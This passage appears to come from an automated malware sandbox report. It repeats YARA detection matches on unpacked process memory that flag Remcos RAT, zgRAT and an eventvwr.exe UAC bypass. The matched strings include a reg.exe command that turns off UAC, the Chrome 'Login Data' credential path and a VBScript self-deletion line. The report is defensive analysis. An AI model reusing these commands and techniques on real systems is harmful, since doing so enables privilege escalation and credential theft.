0x61010:$str_b17: fso.DeleteFolder " 0x6069c:$str_b18: Uploaded file: 0x6065c:$str_b19: Unable to delete: 0x60fa8:$str_b20: while fso.FileExists(" 0x60b31:$str_c0: [Firefox StoredLogins not found]
28.0.InstallUtil.exe.400000.6.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
28.0.InstallUtil.exe.400000.6.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer	detects Windows exceutables potentially bypassing UAC using eventvwr.exe	ditekSHen	0x60500:$s1: \Classes\mscfile\shell\open\command 0x60560:$s1: \Classes\mscfile\shell\open\command 0x60548:$s2: eventvwr.exe
28.0.InstallUtil.exe.400000.6.unpack	REMCOS_RAT_variants	unknown	unknown	0x61494:$str_a1: C:\Windows\System32\cmd.exe 0x61410:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x61410:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x609f8:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x61050:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x605f4:$str_b2: Executing file: 0x615d8:$str_b3: GetDirectListeningPort 0x60e10:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x61038:$str_b7: \update.vbs 0x6061c:$str_b9: Downloaded file: 0x60608:$str_b10: Downloading file: 0x606ac:$str_b12: Failed to upload file: 0x615a0:$str_b13: StartForward 0x615c0:$str_b14: StopForward 0x60fe0:$str_b15: fso.DeleteFile " 0x60f74:$str_b16: On Error Resume Next 0x61010:$str_b17: fso.DeleteFolder " 0x6069c:$str_b18: Uploaded file: 0x6065c:$str_b19: Unable to delete: 0x60fa8:$str_b20: while fso.FileExists(" 0x60b31:$str_c0: [Firefox StoredLogins not found]
17.0.InstallUtil.exe.400000.5.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
17.0.InstallUtil.exe.400000.5.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer	detects Windows exceutables potentially bypassing UAC using eventvwr.exe	ditekSHen	0x60500:$s1: \Classes\mscfile\shell\open\command 0x60560:$s1: \Classes\mscfile\shell\open\command 0x60548:$s2: eventvwr.exe
17.0.InstallUtil.exe.400000.5.unpack	REMCOS_RAT_variants	unknown	unknown	0x61494:$str_a1: C:\Windows\System32\cmd.exe 0x61410:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x61410:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x609f8:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x61050:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x605f4:$str_b2: Executing file: 0x615d8:$str_b3: GetDirectListeningPort 0x60e10:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x61038:$str_b7: \update.vbs 0x6061c:$str_b9: Downloaded file: 0x60608:$str_b10: Downloading file: 0x606ac:$str_b12: Failed to upload file: 0x615a0:$str_b13: StartForward 0x615c0:$str_b14: StopForward 0x60fe0:$str_b15: fso.DeleteFile " 0x60f74:$str_b16: On Error Resume Next 0x61010:$str_b17: fso.DeleteFolder " 0x6069c:$str_b18: Uploaded file: 0x6065c:$str_b19: Unable to delete: 0x60fa8:$str_b20: while fso.FileExists(" 0x60b31:$str_c0: [Firefox StoredLogins not found]
26.0.InstallUtil.exe.400000.2.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
26.0.InstallUtil.exe.400000.2.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer	detects Windows exceutables potentially bypassing UAC using eventvwr.exe	ditekSHen	0x60500:$s1: \Classes\mscfile\shell\open\command 0x60560:$s1: \Classes\mscfile\shell\open\command 0x60548:$s2: eventvwr.exe
26.0.InstallUtil.exe.400000.2.unpack	REMCOS_RAT_variants	unknown	unknown	0x61494:$str_a1: C:\Windows\System32\cmd.exe 0x61410:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x61410:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x609f8:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x61050:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x605f4:$str_b2: Executing file: 0x615d8:$str_b3: GetDirectListeningPort 0x60e10:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x61038:$str_b7: \update.vbs 0x6061c:$str_b9: Downloaded file: 0x60608:$str_b10: Downloading file: 0x606ac:$str_b12: Failed to upload file: 0x615a0:$str_b13: StartForward 0x615c0:$str_b14: StopForward 0x60fe0:$str_b15: fso.DeleteFile " 0x60f74:$str_b16: On Error Resume Next 0x61010:$str_b17: fso.DeleteFolder " 0x6069c:$str_b18: Uploaded file: 0x6065c:$str_b19: Unable to delete: 0x60fa8:$str_b20: while fso.FileExists(" 0x60b31:$str_c0: [Firefox StoredLogins not found]
28.0.InstallUtil.exe.400000.1.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
28.0.InstallUtil.exe.400000.1.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer	detects Windows exceutables potentially bypassing UAC using eventvwr.exe	ditekSHen	0x60500:$s1: \Classes\mscfile\shell\open\command 0x60560:$s1: \Classes\mscfile\shell\open\command 0x60548:$s2: eventvwr.exe
28.0.InstallUtil.exe.400000.1.unpack	REMCOS_RAT_variants	unknown	unknown	0x61494:$str_a1: C:\Windows\System32\cmd.exe 0x61410:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x61410:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x609f8:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x61050:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x605f4:$str_b2: Executing file: 0x615d8:$str_b3: GetDirectListeningPort 0x60e10:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x61038:$str_b7: \update.vbs 0x6061c:$str_b9: Downloaded file: 0x60608:$str_b10: Downloading file: 0x606ac:$str_b12: Failed to upload file: 0x615a0:$str_b13: StartForward 0x615c0:$str_b14: StopForward 0x60fe0:$str_b15: fso.DeleteFile " 0x60f74:$str_b16: On Error Resume Next 0x61010:$str_b17: fso.DeleteFolder " 0x6069c:$str_b18: Uploaded file: 0x6065c:$str_b19: Unable to delete: 0x60fa8:$str_b20: while fso.FileExists(" 0x60b31:$str_c0: [Firefox StoredLogins not found]
28.0.InstallUtil.exe.400000.7.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
28.0.InstallUtil.exe.400000.7.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer	detects Windows exceutables potentially bypassing UAC using eventvwr.exe	ditekSHen	0x60500:$s1: \Classes\mscfile\shell\open\command 0x60560:$s1: \Classes\mscfile\shell\open\command 0x60548:$s2: eventvwr.exe
28.0.InstallUtil.exe.400000.7.unpack	REMCOS_RAT_variants	unknown	unknown	0x61494:$str_a1: C:\Windows\System32\cmd.exe 0x61410:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x61410:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x609f8:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x61050:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x605f4:$str_b2: Executing file: 0x615d8:$str_b3: GetDirectListeningPort 0x60e10:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x61038:$str_b7: \update.vbs 0x6061c:$str_b9: Downloaded file: 0x60608:$str_b10: Downloading file: 0x606ac:$str_b12: Failed to upload file: 0x615a0:$str_b13: StartForward 0x615c0:$str_b14: StopForward 0x60fe0:$str_b15: fso.DeleteFile " 0x60f74:$str_b16: On Error Resume Next 0x61010:$str_b17: fso.DeleteFolder " 0x6069c:$str_b18: Uploaded file: 0x6065c:$str_b19: Unable to delete: 0x60fa8:$str_b20: while fso.FileExists(" 0x60b31:$str_c0: [Firefox StoredLogins not found]
17.0.InstallUtil.exe.400000.6.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
17.0.InstallUtil.exe.400000.6.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer	detects Windows exceutables potentially bypassing UAC using eventvwr.exe	ditekSHen	0x60500:$s1: \Classes\mscfile\shell\open\command 0x60560:$s1: \Classes\mscfile\shell\open\command 0x60548:$s2: eventvwr.exe
17.0.InstallUtil.exe.400000.6.unpack	REMCOS_RAT_variants	unknown	unknown	0x61494:$str_a1: C:\Windows\System32\cmd.exe 0x61410:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x61410:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x609f8:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x61050:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x605f4:$str_b2: Executing file: 0x615d8:$str_b3: GetDirectListeningPort 0x60e10:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x61038:$str_b7: \update.vbs 0x6061c:$str_b9: Downloaded file: 0x60608:$str_b10: Downloading file: 0x606ac:$str_b12: Failed to upload file: 0x615a0:$str_b13: StartForward 0x615c0:$str_b14: StopForward 0x60fe0:$str_b15: fso.DeleteFile " 0x60f74:$str_b16: On Error Resume Next 0x61010:$str_b17: fso.DeleteFolder " 0x6069c:$str_b18: Uploaded file: 0x6065c:$str_b19: Unable to delete: 0x60fa8:$str_b20: while fso.FileExists(" 0x60b31:$str_c0: [Firefox StoredLogins not found]
26.2.InstallUtil.exe.400000.0.raw.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
26.2.InstallUtil.exe.400000.0.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer	detects Windows exceutables potentially bypassing UAC using eventvwr.exe	ditekSHen	0x61100:$s1: \Classes\mscfile\shell\open\command 0x61160:$s1: \Classes\mscfile\shell\open\command 0x61148:$s2: eventvwr.exe
26.2.InstallUtil.exe.400000.0.raw.unpack	REMCOS_RAT_variants	unknown	unknown	0x62094:$str_a1: C:\Windows\System32\cmd.exe 0x62010:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x62010:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x615f8:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x61c50:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x611f4:$str_b2: Executing file: 0x621d8:$str_b3: GetDirectListeningPort 0x61a10:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x61c38:$str_b7: \update.vbs 0x6121c:$str_b9: Downloaded file: 0x61208:$str_b10: Downloading file: 0x612ac:$str_b12: Failed to upload file: 0x621a0:$str_b13: StartForward 0x621c0:$str_b14: StopForward 0x61be0:$str_b15: fso.DeleteFile " 0x61b74:$str_b16: On Error Resume Next 0x61c10:$str_b17: fso.DeleteFolder " 0x6129c:$str_b18: Uploaded file: 0x6125c:$str_b19: Unable to delete: 0x61ba8:$str_b20: while fso.FileExists(" 0x61731:$str_c0: [Firefox StoredLogins not found]
28.2.InstallUtil.exe.400000.0.raw.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
28.2.InstallUtil.exe.400000.0.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer	detects Windows exceutables potentially bypassing UAC using eventvwr.exe	ditekSHen	0x61100:$s1: \Classes\mscfile\shell\open\command 0x61160:$s1: \Classes\mscfile\shell\open\command 0x61148:$s2: eventvwr.exe
28.2.InstallUtil.exe.400000.0.raw.unpack	REMCOS_RAT_variants	unknown	unknown	0x62094:$str_a1: C:\Windows\System32\cmd.exe 0x62010:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x62010:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x615f8:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x61c50:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x611f4:$str_b2: Executing file: 0x621d8:$str_b3: GetDirectListeningPort 0x61a10:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x61c38:$str_b7: \update.vbs 0x6121c:$str_b9: Downloaded file: 0x61208:$str_b10: Downloading file: 0x612ac:$str_b12: Failed to upload file: 0x621a0:$str_b13: StartForward 0x621c0:$str_b14: StopForward 0x61be0:$str_b15: fso.DeleteFile " 0x61b74:$str_b16: On Error Resume Next 0x61c10:$str_b17: fso.DeleteFolder " 0x6129c:$str_b18: Uploaded file: 0x6125c:$str_b19: Unable to delete: 0x61ba8:$str_b20: while fso.FileExists(" 0x61731:$str_c0: [Firefox StoredLogins not found]
0.2.kyFBQxVbsg.exe.38cfb10.3.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
0.2.kyFBQxVbsg.exe.38cfb10.3.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer	detects Windows exceutables potentially bypassing UAC using eventvwr.exe	ditekSHen	0x5f900:$s1: \Classes\mscfile\shell\open\command 0x5f960:$s1: \Classes\mscfile\shell\open\command 0x5f948:$s2: eventvwr.exe
0.2.kyFBQxVbsg.exe.38cfb10.3.unpack	REMCOS_RAT_variants	unknown	unknown	0x60894:$str_a1: C:\Windows\System32\cmd.exe 0x60810:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x60810:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x5fdf8:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x60450:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x5f9f4:$str_b2: Executing file: 0x609d8:$str_b3: GetDirectListeningPort 0x60210:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x60438:$str_b7: \update.vbs 0x5fa1c:$str_b9: Downloaded file: 0x5fa08:$str_b10: Downloading file: 0x5faac:$str_b12: Failed to upload file: 0x609a0:$str_b13: StartForward 0x609c0:$str_b14: StopForward 0x603e0:$str_b15: fso.DeleteFile " 0x60374:$str_b16: On Error Resume Next 0x60410:$str_b17: fso.DeleteFolder " 0x5fa9c:$str_b18: Uploaded file: 0x5fa5c:$str_b19: Unable to delete: 0x603a8:$str_b20: while fso.FileExists(" 0x5ff31:$str_c0: [Firefox StoredLogins not found]
26.0.InstallUtil.exe.400000.8.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
26.0.InstallUtil.exe.400000.8.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer	detects Windows exceutables potentially bypassing UAC using eventvwr.exe	ditekSHen	0x60500:$s1: \Classes\mscfile\shell\open\command 0x60560:$s1: \Classes\mscfile\shell\open\command 0x60548:$s2: eventvwr.exe
26.0.InstallUtil.exe.400000.8.unpack	REMCOS_RAT_variants	unknown	unknown	0x61494:$str_a1: C:\Windows\System32\cmd.exe 0x61410:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x61410:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x609f8:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x61050:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x605f4:$str_b2: Executing file: 0x615d8:$str_b3: GetDirectListeningPort 0x60e10:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x61038:$str_b7: \update.vbs 0x6061c:$str_b9: Downloaded file: 0x60608:$str_b10: Downloading file: 0x606ac:$str_b12: Failed to upload file: 0x615a0:$str_b13: StartForward 0x615c0:$str_b14: StopForward 0x60fe0:$str_b15: fso.DeleteFile " 0x60f74:$str_b16: On Error Resume Next 0x61010:$str_b17: fso.DeleteFolder " 0x6069c:$str_b18: Uploaded file: 0x6065c:$str_b19: Unable to delete: 0x60fa8:$str_b20: while fso.FileExists(" 0x60b31:$str_c0: [Firefox StoredLogins not found]
26.0.InstallUtil.exe.400000.5.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
26.0.InstallUtil.exe.400000.5.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer	detects Windows exceutables potentially bypassing UAC using eventvwr.exe	ditekSHen	0x60500:$s1: \Classes\mscfile\shell\open\command 0x60560:$s1: \Classes\mscfile\shell\open\command 0x60548:$s2: eventvwr.exe
26.0.InstallUtil.exe.400000.5.unpack	REMCOS_RAT_variants	unknown	unknown	0x61494:$str_a1: C:\Windows\System32\cmd.exe 0x61410:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x61410:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x609f8:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x61050:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x605f4:$str_b2: Executing file: 0x615d8:$str_b3: GetDirectListeningPort 0x60e10:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x61038:$str_b7: \update.vbs 0x6061c:$str_b9: Downloaded file: 0x60608:$str_b10: Downloading file: 0x606ac:$str_b12: Failed to upload file: 0x615a0:$str_b13: StartForward 0x615c0:$str_b14: StopForward 0x60fe0:$str_b15: fso.DeleteFile " 0x60f74:$str_b16: On Error Resume Next 0x61010:$str_b17: fso.DeleteFolder " 0x6069c:$str_b18: Uploaded file: 0x6065c:$str_b19: Unable to delete: 0x60fa8:$str_b20: while fso.FileExists(" 0x60b31:$str_c0: [Firefox StoredLogins not found]
28.0.InstallUtil.exe.400000.7.raw.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
28.0.InstallUtil.exe.400000.7.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer	detects Windows exceutables potentially bypassing UAC using eventvwr.exe	ditekSHen	0x61100:$s1: \Classes\mscfile\shell\open\command 0x61160:$s1: \Classes\mscfile\shell\open\command 0x61148:$s2: eventvwr.exe
28.0.InstallUtil.exe.400000.7.raw.unpack	REMCOS_RAT_variants	unknown	unknown	0x62094:$str_a1: C:\Windows\System32\cmd.exe 0x62010:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x62010:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x615f8:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x61c50:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x611f4:$str_b2: Executing file: 0x621d8:$str_b3: GetDirectListeningPort 0x61a10:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x61c38:$str_b7: \update.vbs 0x6121c:$str_b9: Downloaded file: 0x61208:$str_b10: Downloading file: 0x612ac:$str_b12: Failed to upload file: 0x621a0:$str_b13: StartForward 0x621c0:$str_b14: StopForward 0x61be0:$str_b15: fso.DeleteFile " 0x61b74:$str_b16: On Error Resume Next 0x61c10:$str_b17: fso.DeleteFolder " 0x6129c:$str_b18: Uploaded file: 0x6125c:$str_b19: Unable to delete: 0x61ba8:$str_b20: while fso.FileExists(" 0x61731:$str_c0: [Firefox StoredLogins not found]
17.2.InstallUtil.exe.400000.0.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
17.2.InstallUtil.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer	detects Windows exceutables potentially bypassing UAC using eventvwr.exe	ditekSHen	0x60500:$s1: \Classes\mscfile\shell\open\command 0x60560:$s1: \Classes\mscfile\shell\open\command 0x60548:$s2: eventvwr.exe
17.2.InstallUtil.exe.400000.0.unpack	REMCOS_RAT_variants	unknown	unknown	0x61494:$str_a1: C:\Windows\System32\cmd.exe 0x61410:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x61410:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x609f8:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x61050:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x605f4:$str_b2: Executing file: 0x615d8:$str_b3: GetDirectListeningPort 0x60e10:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x61038:$str_b7: \update.vbs 0x6061c:$str_b9: Downloaded file: 0x60608:$str_b10: Downloading file: 0x606ac:$str_b12: Failed to upload file: 0x615a0:$str_b13: StartForward 0x615c0:$str_b14: StopForward 0x60fe0:$str_b15: fso.DeleteFile " 0x60f74:$str_b16: On Error Resume Next 0x61010:$str_b17: fso.DeleteFolder " 0x6069c:$str_b18: Uploaded file: 0x6065c:$str_b19: Unable to delete: 0x60fa8:$str_b20: while fso.FileExists(" 0x60b31:$str_c0: [Firefox StoredLogins not found]
0.2.kyFBQxVbsg.exe.4ba0000.4.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
0.2.kyFBQxVbsg.exe.4ba0000.4.raw.unpack	MALWARE_Win_zgRAT	Detects zgRAT	ditekSHen	0x5d4a2:$s1: file:/// 0x5d3fe:$s2: {11111-22222-10009-11112} 0x5d432:$s3: {11111-22222-50001-00000} 0x5a103:$s4: get_Module 0x5a21f:$s5: Reverse 0x5b922:$s6: BlockCopy 0x5bfa4:$s7: ReadByte 0x5d4b6:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
17.0.InstallUtil.exe.400000.3.raw.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
17.0.InstallUtil.exe.400000.3.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer	detects Windows exceutables potentially bypassing UAC using eventvwr.exe	ditekSHen	0x61100:$s1: \Classes\mscfile\shell\open\command 0x61160:$s1: \Classes\mscfile\shell\open\command 0x61148:$s2: eventvwr.exe
17.0.InstallUtil.exe.400000.3.raw.unpack	REMCOS_RAT_variants	unknown	unknown	0x62094:$str_a1: C:\Windows\System32\cmd.exe 0x62010:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x62010:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x615f8:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x61c50:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x611f4:$str_b2: Executing file: 0x621d8:$str_b3: GetDirectListeningPort 0x61a10:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x61c38:$str_b7: \update.vbs 0x6121c:$str_b9: Downloaded file: 0x61208:$str_b10: Downloading file: 0x612ac:$str_b12: Failed to upload file: 0x621a0:$str_b13: StartForward 0x621c0:$str_b14: StopForward 0x61be0:$str_b15: fso.DeleteFile " 0x61b74:$str_b16: On Error Resume Next 0x61c10:$str_b17: fso.DeleteFolder " 0x6129c:$str_b18: Uploaded file: 0x6125c:$str_b19: Unable to delete: 0x61ba8:$str_b20: while fso.FileExists(" 0x61731:$str_c0: [Firefox StoredLogins not found]
17.0.InstallUtil.exe.400000.0.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
17.0.InstallUtil.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer	detects Windows exceutables potentially bypassing UAC using eventvwr.exe	ditekSHen	0x60500:$s1: \Classes\mscfile\shell\open\command 0x60560:$s1: \Classes\mscfile\shell\open\command 0x60548:$s2: eventvwr.exe
17.0.InstallUtil.exe.400000.0.unpack	REMCOS_RAT_variants	unknown	unknown	0x61494:$str_a1: C:\Windows\System32\cmd.exe 0x61410:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x61410:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x609f8:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x61050:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x605f4:$str_b2: Executing file: 0x615d8:$str_b3: GetDirectListeningPort 0x60e10:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x61038:$str_b7: \update.vbs 0x6061c:$str_b9: Downloaded file: 0x60608:$str_b10: Downloading file: 0x606ac:$str_b12: Failed to upload file: 0x615a0:$str_b13: StartForward 0x615c0:$str_b14: StopForward 0x60fe0:$str_b15: fso.DeleteFile " 0x60f74:$str_b16: On Error Resume Next 0x61010:$str_b17: fso.DeleteFolder " 0x6069c:$str_b18: Uploaded file: 0x6065c:$str_b19: Unable to delete: 0x60fa8:$str_b20: while fso.FileExists(" 0x60b31:$str_c0: [Firefox StoredLogins not found]
28.0.InstallUtil.exe.400000.4.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
28.0.InstallUtil.exe.400000.4.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer	detects Windows exceutables potentially bypassing UAC using eventvwr.exe	ditekSHen	0x60500:$s1: \Classes\mscfile\shell\open\command 0x60560:$s1: \Classes\mscfile\shell\open\command 0x60548:$s2: eventvwr.exe
28.0.InstallUtil.exe.400000.4.unpack	REMCOS_RAT_variants	unknown	unknown	0x61494:$str_a1: C:\Windows\System32\cmd.exe 0x61410:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x61410:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x609f8:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x61050:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x605f4:$str_b2: Executing file: 0x615d8:$str_b3: GetDirectListeningPort 0x60e10:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x61038:$str_b7: \update.vbs 0x6061c:$str_b9: Downloaded file: 0x60608:$str_b10: Downloading file: 0x606ac:$str_b12: Failed to upload file: 0x615a0:$str_b13: StartForward 0x615c0:$str_b14: StopForward 0x60fe0:$str_b15: fso.DeleteFile " 0x60f74:$str_b16: On Error Resume Next 0x61010:$str_b17: fso.DeleteFolder " 0x6069c:$str_b18: Uploaded file: 0x6065c:$str_b19: Unable to delete: 0x60fa8:$str_b20: while fso.FileExists(" 0x60b31:$str_c0: [Firefox StoredLogins not found]
28.0.InstallUtil.exe.400000.0.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
